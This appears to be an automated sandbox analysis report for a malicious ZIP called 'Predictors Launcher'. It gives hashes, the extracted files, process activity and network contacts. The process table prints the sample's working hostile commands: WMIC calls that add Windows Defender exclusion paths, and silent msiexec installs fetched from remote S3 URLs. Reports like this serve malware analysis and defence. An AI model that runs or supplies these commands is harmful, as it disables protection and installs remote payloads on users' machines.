File name: | Predictors Launcher.zip |
Full analysis: | https://app.any.run/tasks/95bff351-8beb-4545-b0f3-df4970292c14 |
Verdict: | Malicious activity |
Analysis date: | November 30, 2020, 04:56:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 89C4A743932432DA19F4618DDE07E04A |
SHA1: | 4A4C1CD2BFDD709AD355CD2B337DBD0BEE4386F2 |
SHA256: | F56A2021AB0C2E24BC6BD384704739295A92694EA713F3057EC9D8AE9212C194 |
SSDEEP: | 393216:qwNlj7V6fltnF8arHxgZOxqbh4V2nBMgPyXAU:l6ttnTjxgZOxW4ViNyQU |
.xpi | | | Mozilla Firefox browser extension (66.6) |
---|---|---|
.zip | | | ZIP compressed archive (33.3) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2017:02:14 07:38:11 |
ZipCRC: | 0xdc9d6294 |
ZipCompressedSize: | 1104 |
ZipUncompressedSize: | 4149 |
ZipFileName: | Predictors Launcher/AntiBusteds (1).dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2876 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predictors Launcher.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3024 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe | — | WinRAR.exe |
User: admin Integrity Level: MEDIUM Exit code: 3221226540 | ||||
552 | "C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe | WinRAR.exe | |
User: admin Integrity Level: HIGH Exit code: 0 | ||||
2496 | "C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\Local | C:\Windows\System32\wbem\WMIC.exe | — | Predictor Launcher.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 2147749902 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3316 | "C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\Roaming | C:\Windows\System32\wbem\WMIC.exe | — | Predictor Launcher.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: WMI Commandline Utility Exit code: 2147749902 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3692 | "C:\Windows\System32\msiexec.exe" /i https://sasosa.s3.amazonaws.com/EY3ZTKXKWRXB93ODV94761XD34RU0NUH.msi /qn | C:\Windows\System32\msiexec.exe | — | Predictor Launcher.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3004 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3784 | "C:\Windows\System32\cmd.exe" taskkill / IM msiexec.exe | C:\Windows\System32\cmd.exe | — | Predictor Launcher.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2008 | "C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/reza.msi /qn | C:\Windows\System32\msiexec.exe | — | Predictor Launcher.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows® installer Exit code: 1618 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2052 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIa2876.6267\READ IMPORTANT HOW TO INSTALL.txt | C:\Windows\system32\NOTEPAD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\AntiBusteds (1).dll | text | |
MD5:113F80EE3DC312A093CE9E89F95404FE | SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\AntiBusteds (2).dll | text | |
MD5:113F80EE3DC312A093CE9E89F95404FE | SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\datetime.h | text | |
MD5:958421EA055F38A3A54538A6C84795D5 | SHA256:A80CA694DCCFE8EE65E3BBD2DFC57ADF2BE9464CA37EFE2B84471FF1FD61CDE7 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\bytearrayobject.h | text | |
MD5:0310F1528CA7A9966680F95117EA487E | SHA256:400E6E276FC3FA823F29629FECFF302BD08D1ABB896FB500C4FAA334AA3293FD | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\boolobject.h | text | |
MD5:DCC48FC557F8337D7BAA90E13D34B36A | SHA256:9483A995582F2DDAD6B47F85BB300371346CA10E846B923170D39E523815134F | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\complexobject.h | text | |
MD5:FA93753FDBEFD8869D0EFE7EBC0E52A7 | SHA256:581414618CD495C42A82C3F0AB1A4E3F10A294E2FB4BB1EFCFEB44BCD0EC3A42 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Data\Ankama Helsa.dll | executable | |
MD5:1F8DB83C98BC6528589B061BD7055472 | SHA256:93D519B30A7D388FA983B14C94119088C3C3EA91512FE42D104E5343AA0F38E8 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\ceval.h | text | |
MD5:AC76D8E98C4419356787EF0F0A70955C | SHA256:A50DDF6E874CFD1FD226080BF31E4636A2F5FAD806A4116CBD68EDB612932515 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\bytesobject.h | text | |
MD5:EE293911E2B74B3AAF1F8599FB88FFB8 | SHA256:1582D6984B4FD2ED407CBD50B3AD97B79FA95451D39333F1D6966FAC40262974 | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\cellobject.h | text | |
MD5:BAA321AEBD7EF2A8D505C75B76F50BEC | SHA256:A277081668BC14F99518B3B7FBC8C8E1B98CC89BD3D1E6AB02D864ECE1209A9C |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3004 | msiexec.exe | 52.217.96.28:443 | sasosa.s3.amazonaws.com | Amazon.com, Inc. | US | shared |
Domain | IP | Reputation |
---|---|---|
sasosa.s3.amazonaws.com |
| shared |